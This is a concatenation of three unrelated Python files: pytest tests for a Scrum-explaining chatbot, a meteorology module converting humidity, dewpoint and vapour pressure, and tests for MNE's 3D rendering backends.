response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
for i in range(0, len(dict.scrum) - 2):
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'] == 'That is it for the crash course in scrum. Would you like to restart?'
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
def test_guide_restart():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
response = send_message(handler, "No", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 0
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
@pytest.mark.skip(reason="This test will fail, because the behavior is currently not supported")
def test_guide_reenter():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
response = send_message(handler, "No", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 0
response = send_message(handler, "Yes", "test_session") # TODO This input will mess up the dialogue
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 0
def test_details():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
detail = "agile"
response = send_message(handler, "Tell me more about " + detail, "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain Detail
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain_detail"
assert response['dialogue'][0]['title'] == detail
assert response['dialogue'][0]['content'] == dict.scrum[theme]['details'][detail]
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
def test_continue_details():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
detail = "agile"
response = send_message(handler, "Tell me more about " + detail, "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain Detail
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain_detail"
assert response['dialogue'][0]['title'] == detail
assert response['dialogue'][0]['content'] == dict.scrum[theme]['details'][detail]
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
detail = "business value"
response = send_message(handler, "Tell me more about " + detail, "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain Detail
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain_detail"
assert response['dialogue'][0]['title'] == detail
assert response['dialogue'][0]['content'] == dict.scrum[theme]['details'][detail]
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
def test_continue_after_detail():
handler = MessageHandler({"scrum"})
response = send_message(handler, "What is Scrum about?", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], dict.scrum[theme]['details'])
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
detail = "agile"
response = send_message(handler, "Tell me more about " + detail, "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain Detail
theme = get_first_theme()
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain_detail"
assert response['dialogue'][0]['title'] == detail
assert response['dialogue'][0]['content'] == dict.scrum[theme]['details'][detail]
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
response = send_message(handler, "Yes", "test_session")
assert response['sender'] == "test_session"
assert len(response['dialogue']) == 2
# Explain
assert response['dialogue'][0]['action_type'] == "explain"
assert response['dialogue'][0]['action_name'] == "explain"
assert response['dialogue'][0]['title'] == theme
assert response['dialogue'][0]['content'] == dict.scrum[theme]['general']
if 'replyOptions' in response['dialogue'][0]:
assert reply_options_contain_details(response['dialogue'][0]['replyOptions'], filter_details(theme, detail))
# Continue
theme = get_next_theme(theme)
assert response['dialogue'][1]['action_type'] == "continue"
assert response['dialogue'][1]['action_name'] == "continue"
assert response['dialogue'][1]['content'].endswith(theme + '?')
assert response['dialogue'][1]['replyOptions'] == [{"text": "yes", "reply": "yes"}]
def send_message(handler, message, session_id):
return json.loads(handler.converse(message, session_id))
def get_first_theme():
for theme in dict.scrum:
if dict.scrum[theme]['position'] == 1:
return theme
def get_next_theme(current_theme):
for theme in dict.scrum:
if dict.scrum[theme]['position'] == dict.scrum[current_theme]['position'] + 1:
return theme
return None
def filter_details(current_theme, current_detail):
details = []
for detail in dict.scrum[current_theme]['details']:
if detail != current_detail:
details.append(detail)
return details
def reply_options_contain_details(reply_options, details):
for detail in details:
detail_exists = False
print(reply_options)
for reply in reply_options:
if reply['reply'] == "Tell me more about " + detail:
detail_exists = True
if not detail_exists:
return False
return True
|
|
"""Conversion methods for atmospheric-moisture variables."""
import numpy
from gewittergefahr.gg_utils import temperature_conversions as temperature_conv
from gewittergefahr.gg_utils import error_checking
DRY_AIR_GAS_CONSTANT_J_KG01_K01 = 287.04
WATER_VAPOUR_GAS_CONSTANT_J_KG01_K01 = 461.5
EPSILON = DRY_AIR_GAS_CONSTANT_J_KG01_K01 / WATER_VAPOUR_GAS_CONSTANT_J_KG01_K01
BASE_VAPOUR_PRESSURE_PASCALS = 610.78
MAGNUS_NUMERATOR_COEFF_WATER = 17.08085
MAGNUS_NUMERATOR_COEFF_ICE = 17.84362
MAGNUS_DENOMINATOR_COEFF_WATER = 234.175
MAGNUS_DENOMINATOR_COEFF_ICE = 245.425
def specific_humidity_to_mixing_ratio(specific_humidities_kg_kg01):
"""Converts each specific humidity to mixing ratio.
:param specific_humidities_kg_kg01: numpy array (any shape) of specific
humidities (kg per kg).
:return: mixing_ratios_kg_kg01: numpy array (same shape) of mixing ratios
(kg per kg).
"""
error_checking.assert_is_geq_numpy_array(
specific_humidities_kg_kg01, 0., allow_nan=True
)
return specific_humidities_kg_kg01 / (1 - specific_humidities_kg_kg01)
def mixing_ratio_to_specific_humidity(mixing_ratios_kg_kg01):
"""Converts each mixing ratio to specific humidity.
:param mixing_ratios_kg_kg01: numpy array (any shape) of mixing ratios
(kg per kg).
:return: specific_humidities_kg_kg01: numpy array (same shape) of specific
humidities (kg per kg).
"""
error_checking.assert_is_geq_numpy_array(
mixing_ratios_kg_kg01, 0., allow_nan=True
)
return mixing_ratios_kg_kg01 / (1 + mixing_ratios_kg_kg01)
def mixing_ratio_to_vapour_pressure(
mixing_ratios_kg_kg01, total_pressures_pascals):
"""Converts each mixing ratio to vapour pressure.
:param mixing_ratios_kg_kg01: numpy array (any shape) of mixing ratios
(kg per kg).
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: vapour_pressures_pascals: numpy array (same shape) of vapour
pressures.
"""
error_checking.assert_is_geq_numpy_array(
mixing_ratios_kg_kg01, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(mixing_ratios_kg_kg01.shape, dtype=int)
)
return (
mixing_ratios_kg_kg01 * total_pressures_pascals /
(EPSILON + mixing_ratios_kg_kg01)
)
def vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals, total_pressures_pascals):
"""Converts each vapour pressure to mixing ratio.
:param vapour_pressures_pascals: numpy array (any shape) of vapour
pressures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: mixing_ratios_kg_kg01: numpy array (same shape) of mixing ratios
(kg per kg).
"""
error_checking.assert_is_geq_numpy_array(
vapour_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(vapour_pressures_pascals.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals - vapour_pressures_pascals, 0., allow_nan=True
)
denominators = total_pressures_pascals - vapour_pressures_pascals
mixing_ratios_kg_kg01 = EPSILON * vapour_pressures_pascals / denominators
mixing_ratios_kg_kg01[denominators <= 0] = 0
return mixing_ratios_kg_kg01
def vapour_pressure_to_dewpoint(vapour_pressures_pascals, temperatures_kelvins):
"""Converts each vapour pressure to dewpoint.
Source:
https://content.meteoblue.com/hu/specifications/weather-variables/humidity
:param vapour_pressures_pascals: numpy array (any shape) of vapour
pressures.
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:return: dewpoints_kelvins: numpy array (same shape) of dewpoints.
"""
error_checking.assert_is_geq_numpy_array(
vapour_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
temperatures_kelvins,
exact_dimensions=numpy.array(vapour_pressures_pascals.shape, dtype=int)
)
logarithms = numpy.log(
vapour_pressures_pascals / BASE_VAPOUR_PRESSURE_PASCALS
)
temperatures_deg_c = temperature_conv.kelvins_to_celsius(
temperatures_kelvins
)
numerator_coeffs = numpy.full(
temperatures_deg_c.shape, MAGNUS_DENOMINATOR_COEFF_WATER
)
numerator_coeffs[temperatures_deg_c < 0] = MAGNUS_DENOMINATOR_COEFF_ICE
numerators = numerator_coeffs * logarithms
denominator_coeffs = numpy.full(
temperatures_deg_c.shape, MAGNUS_NUMERATOR_COEFF_WATER
)
denominator_coeffs[temperatures_deg_c < 0] = MAGNUS_NUMERATOR_COEFF_ICE
denominators = denominator_coeffs - logarithms
dewpoints_deg_c = numerators / denominators
dewpoints_deg_c[numpy.invert(numpy.isfinite(dewpoints_deg_c))] = (
-temperature_conv.CELSIUS_TO_KELVINS_ADDEND
)
dewpoints_kelvins = temperature_conv.celsius_to_kelvins(dewpoints_deg_c)
dewpoints_kelvins[dewpoints_deg_c + numerator_coeffs < 0] = 0.
return dewpoints_kelvins
def dewpoint_to_vapour_pressure(dewpoints_kelvins, temperatures_kelvins,
total_pressures_pascals):
"""Converts each dewpoint to vapour pressure.
Source:
https://content.meteoblue.com/hu/specifications/weather-variables/humidity
:param dewpoints_kelvins: numpy array (any shape) of dewpoints.
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: vapour_pressures_pascals: numpy array (same shape) of vapour
pressures.
"""
error_checking.assert_is_geq_numpy_array(
dewpoints_kelvins, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
temperatures_kelvins,
exact_dimensions=numpy.array(dewpoints_kelvins.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(dewpoints_kelvins.shape, dtype=int)
)
dewpoints_deg_c = temperature_conv.kelvins_to_celsius(dewpoints_kelvins)
temperatures_deg_c = temperature_conv.kelvins_to_celsius(
temperatures_kelvins
)
numerator_coeffs = numpy.full(
temperatures_deg_c.shape, MAGNUS_NUMERATOR_COEFF_WATER
)
numerator_coeffs[temperatures_deg_c < 0] = MAGNUS_NUMERATOR_COEFF_ICE
numerators = numerator_coeffs * dewpoints_deg_c
denominator_coeffs = numpy.full(
temperatures_deg_c.shape, MAGNUS_DENOMINATOR_COEFF_WATER
)
denominator_coeffs[temperatures_deg_c < 0] = MAGNUS_DENOMINATOR_COEFF_ICE
denominators = denominator_coeffs + dewpoints_deg_c
vapour_pressures_pascals = (
BASE_VAPOUR_PRESSURE_PASCALS * numpy.exp(numerators / denominators)
)
vapour_pressures_pascals[
numpy.invert(numpy.isfinite(vapour_pressures_pascals))
] = 0.
vapour_pressures_pascals[denominators <= 0] = 0.
return numpy.minimum(vapour_pressures_pascals, total_pressures_pascals)
def specific_humidity_to_dewpoint(
specific_humidities_kg_kg01, temperatures_kelvins,
total_pressures_pascals):
"""Converts each specific humidity to dewpoint.
:param specific_humidities_kg_kg01: numpy array (any shape) of specific
humidities (kg per kg).
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: dewpoints_kelvins: numpy array (same shape) of dewpoints.
"""
mixing_ratios_kg_kg01 = specific_humidity_to_mixing_ratio(
specific_humidities_kg_kg01
)
vapour_pressures_pascals = mixing_ratio_to_vapour_pressure(
mixing_ratios_kg_kg01=mixing_ratios_kg_kg01,
total_pressures_pascals=total_pressures_pascals
)
return vapour_pressure_to_dewpoint(
vapour_pressures_pascals=vapour_pressures_pascals,
temperatures_kelvins=temperatures_kelvins
)
def dewpoint_to_specific_humidity(
dewpoints_kelvins, temperatures_kelvins, total_pressures_pascals):
"""Converts each dewpoint to specific humidity.
:param dewpoints_kelvins: numpy array (any shape) of dewpoints.
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: specific_humidities_kg_kg01: numpy array (same shape) of specific
humidities (kg per kg).
"""
vapour_pressures_pascals = dewpoint_to_vapour_pressure(
dewpoints_kelvins=dewpoints_kelvins,
temperatures_kelvins=temperatures_kelvins,
total_pressures_pascals=total_pressures_pascals
)
mixing_ratios_kg_kg01 = vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals=vapour_pressures_pascals,
total_pressures_pascals=total_pressures_pascals
)
return mixing_ratio_to_specific_humidity(mixing_ratios_kg_kg01)
def relative_humidity_to_dewpoint(
relative_humidities, temperatures_kelvins, total_pressures_pascals):
"""Converts each relative humidity to dewpoint.
:param relative_humidities: numpy array (any shape) of relative humidities
(unitless).
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: dewpoints_kelvins: numpy array (same shape) of dewpoints.
"""
error_checking.assert_is_geq_numpy_array(
relative_humidities, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
temperatures_kelvins,
exact_dimensions=numpy.array(relative_humidities.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(relative_humidities.shape, dtype=int)
)
saturated_vapour_pressures_pascals = dewpoint_to_vapour_pressure(
dewpoints_kelvins=temperatures_kelvins,
temperatures_kelvins=temperatures_kelvins,
total_pressures_pascals=total_pressures_pascals
)
saturated_mixing_ratios_kg_kg01 = vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals=saturated_vapour_pressures_pascals,
total_pressures_pascals=total_pressures_pascals
)
vapour_pressures_pascals = mixing_ratio_to_vapour_pressure(
mixing_ratios_kg_kg01=
relative_humidities * saturated_mixing_ratios_kg_kg01,
total_pressures_pascals=total_pressures_pascals
)
return vapour_pressure_to_dewpoint(
vapour_pressures_pascals=vapour_pressures_pascals,
temperatures_kelvins=temperatures_kelvins
)
def dewpoint_to_relative_humidity(
dewpoints_kelvins, temperatures_kelvins, total_pressures_pascals):
"""Converts each dewpoint to specific humidity.
:param dewpoints_kelvins: numpy array (any shape) of dewpoints.
:param temperatures_kelvins: numpy array (same shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:return: relative_humidities: numpy array (same shape) of relative
humidities (unitless).
"""
error_checking.assert_is_geq_numpy_array(
dewpoints_kelvins, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
temperatures_kelvins,
exact_dimensions=numpy.array(dewpoints_kelvins.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(dewpoints_kelvins.shape, dtype=int)
)
vapour_pressures_pascals = dewpoint_to_vapour_pressure(
dewpoints_kelvins=dewpoints_kelvins,
temperatures_kelvins=temperatures_kelvins,
total_pressures_pascals=total_pressures_pascals
)
mixing_ratios_kg_kg01 = vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals=vapour_pressures_pascals,
total_pressures_pascals=total_pressures_pascals
)
saturated_vapour_pressures_pascals = dewpoint_to_vapour_pressure(
dewpoints_kelvins=temperatures_kelvins,
temperatures_kelvins=temperatures_kelvins,
total_pressures_pascals=total_pressures_pascals
)
saturated_mixing_ratios_kg_kg01 = vapour_pressure_to_mixing_ratio(
vapour_pressures_pascals=saturated_vapour_pressures_pascals,
total_pressures_pascals=total_pressures_pascals
)
relative_humidities = (
mixing_ratios_kg_kg01 / saturated_mixing_ratios_kg_kg01
)
relative_humidities[numpy.invert(numpy.isfinite(relative_humidities))] = 0.
return relative_humidities
def temperature_to_virtual_temperature(
temperatures_kelvins, total_pressures_pascals,
vapour_pressures_pascals):
"""Converts each temperature to virtual temperature.
:param temperatures_kelvins: numpy array (any shape) of temperatures.
:param total_pressures_pascals: numpy array (same shape) of total air
pressures.
:param vapour_pressures_pascals: numpy array (same shape) of vapour
pressures.
:return: virtual_temperatures_kelvins: numpy array (same shape) of virtual
temperatures.
"""
error_checking.assert_is_geq_numpy_array(
temperatures_kelvins, 0., allow_nan=True
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
total_pressures_pascals,
exact_dimensions=numpy.array(temperatures_kelvins.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
vapour_pressures_pascals, 0., allow_nan=True
)
error_checking.assert_is_numpy_array(
vapour_pressures_pascals,
exact_dimensions=numpy.array(temperatures_kelvins.shape, dtype=int)
)
error_checking.assert_is_geq_numpy_array(
total_pressures_pascals - vapour_pressures_pascals, 0., allow_nan=True
)
denominator_values = 1. - (
(vapour_pressures_pascals / total_pressures_pascals) * (1. - EPSILON)
)
virtual_temperatures_kelvins = temperatures_kelvins / denominator_values
virtual_temperatures_kelvins[total_pressures_pascals == 0] = (
temperatures_kelvins[total_pressures_pascals == 0]
)
return virtual_temperatures_kelvins
|
|
# Authors: Alexandre Gramfort <[email protected]>
# Eric Larson <[email protected]>
# Joan Massich <[email protected]>
# Guillaume Favelier <[email protected]>
#
# License: Simplified BSD
import os
import sys
import pytest
import numpy as np
from mne.utils import run_subprocess
from mne.viz import set_3d_backend, get_3d_backend
from mne.viz.backends.renderer import _get_renderer
from mne.viz.backends.tests._utils import (skips_if_not_mayavi,
skips_if_not_pyvistaqt)
from mne.viz.backends._utils import ALLOWED_QUIVER_MODES
@pytest.mark.parametrize('backend', [
pytest.param('mayavi', marks=skips_if_not_mayavi),
pytest.param('pyvistaqt', marks=skips_if_not_pyvistaqt),
pytest.param('foo', marks=pytest.mark.xfail(raises=ValueError)),
])
def test_backend_environment_setup(backend, monkeypatch):
"""Test set up 3d backend based on env."""
monkeypatch.setenv("MNE_3D_BACKEND", backend)
monkeypatch.setattr(
'mne.viz.backends.renderer.MNE_3D_BACKEND', None)
assert os.environ['MNE_3D_BACKEND'] == backend # just double-check
# reload the renderer to check if the 3d backend selection by
# environment variable has been updated correctly
from mne.viz.backends import renderer
renderer.set_3d_backend(backend)
assert renderer.MNE_3D_BACKEND == backend
assert renderer.get_3d_backend() == backend
def test_3d_functions(renderer):
"""Test figure management functions."""
fig = renderer.create_3d_figure((300, 300))
# Mayavi actually needs something in the display to set the title
wrap_renderer = renderer.backend._Renderer(fig=fig)
wrap_renderer.sphere(np.array([0., 0., 0.]), 'w', 1.)
renderer.backend._check_3d_figure(fig)
renderer.set_3d_view(figure=fig, azimuth=None, elevation=None,
focalpoint=(0., 0., 0.), distance=None)
renderer.set_3d_title(figure=fig, title='foo')
renderer.backend._take_3d_screenshot(figure=fig)
renderer.close_3d_figure(fig)
renderer.close_all_3d_figures()
def test_3d_backend(renderer):
"""Test default plot."""
# set data
win_size = (600, 600)
win_color = 'black'
tet_size = 1.0
tet_x = np.array([0, tet_size, 0, 0])
tet_y = np.array([0, 0, tet_size, 0])
tet_z = np.array([0, 0, 0, tet_size])
tet_indices = np.array([[0, 1, 2],
[0, 1, 3],
[0, 2, 3],
[1, 2, 3]])
tet_color = 'white'
sph_center = np.column_stack((tet_x, tet_y, tet_z))
sph_color = 'red'
sph_scale = tet_size / 3.0
ct_scalars = np.array([0.0, 0.0, 0.0, 1.0])
ct_levels = [0.2, 0.4, 0.6, 0.8]
ct_surface = {
"rr": sph_center,
"tris": tet_indices
}
qv_color = 'blue'
qv_scale = tet_size / 2.0
qv_center = np.array([np.mean((sph_center[va, :],
sph_center[vb, :],
sph_center[vc, :]), axis=0)
for (va, vb, vc) in tet_indices])
center = np.mean(qv_center, axis=0)
qv_dir = qv_center - center
qv_scale_mode = 'scalar'
qv_scalars = np.linspace(1.0, 2.0, 4)
txt_x = 0.0
txt_y = 0.0
txt_text = "renderer"
txt_size = 14
cam_distance = 5 * tet_size
# init scene
rend = renderer.create_3d_figure(
size=win_size,
bgcolor=win_color,
smooth_shading=True,
scene=False,
)
for interaction in ('terrain', 'trackball'):
rend.set_interaction(interaction)
# use mesh
mesh_data = rend.mesh(
x=tet_x,
y=tet_y,
z=tet_z,
triangles=tet_indices,
color=tet_color,
)
rend.remove_mesh(mesh_data)
# use contour
rend.contour(surface=ct_surface, scalars=ct_scalars,
contours=ct_levels, kind='line')
rend.contour(surface=ct_surface, scalars=ct_scalars,
contours=ct_levels, kind='tube')
# use sphere
rend.sphere(center=sph_center, color=sph_color,
scale=sph_scale, radius=1.0)
# use quiver3d
kwargs = dict(
x=qv_center[:, 0],
y=qv_center[:, 1],
z=qv_center[:, 2],
u=qv_dir[:, 0],
v=qv_dir[:, 1],
w=qv_dir[:, 2],
color=qv_color,
scale=qv_scale,
scale_mode=qv_scale_mode,
scalars=qv_scalars,
)
for mode in ALLOWED_QUIVER_MODES:
rend.quiver3d(mode=mode, **kwargs)
with pytest.raises(ValueError, match='Invalid value'):
rend.quiver3d(mode='foo', **kwargs)
# use tube
rend.tube(origin=np.array([[0, 0, 0]]),
destination=np.array([[0, 1, 0]]))
_, tube = rend.tube(origin=np.array([[1, 0, 0]]),
destination=np.array([[1, 1, 0]]),
scalars=np.array([[1.0, 1.0]]))
# scalar bar
rend.scalarbar(source=tube, title="Scalar Bar",
bgcolor=[1, 1, 1])
# use text
rend.text2d(x_window=txt_x, y_window=txt_y, text=txt_text,
size=txt_size, justification='right')
